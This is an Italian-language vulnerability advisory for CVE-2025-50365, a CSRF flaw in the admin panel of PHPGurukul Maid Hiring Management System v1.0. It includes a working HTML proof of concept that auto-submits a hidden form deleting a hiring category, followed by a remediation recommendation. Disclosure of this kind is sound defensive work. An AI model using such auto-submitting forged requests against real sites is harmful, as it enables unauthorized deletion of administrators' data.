
PoC per CVE-2025-50365: un difetto CSRF in PHPGurukul Maid Hiring Management System che consente l'eliminazione delle categorie di assunzione tramite una richiesta admin appositamente creata.
Nome del progetto e URL del repository: Maid Hiring Management System usando PHP e MySQL
Tipo di vulnerabilità: Falsificazione di Richiesta Lato Client
Versioni interessate: v1.0
💣Descrizione della vulnerabilità: Una vulnerabilità di Cross-Site Request Forgery (CSRF) esiste nel pannello di amministrazione del PHPGurukul Hiring Management System, consentendo a un attaccante di eliminare categorie di assunzione arbitrarie ingannando un amministratore autenticato affinché visiti un sito malevolo. Ciò può portare alla cancellazione dei dati e a modifiche non autorizzate a livello di amministrazione.
👩💻Impatto: Eliminazione non autorizzata delle categorie.
🛜Proof-of-Concept (PoC):

/admin/manage-category.php
CSRF-POC<html>
<body>
<form action="http://127.0.0.1/mhms/admin/manage-category.php">
<input type="hidden" name="delid" value="13" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>


Raccomandazione: Implementare token CSRF nei moduli di amministrazione, imporre cookie SameSite e validare l'origine della richiesta per prevenire azioni non autorizzate.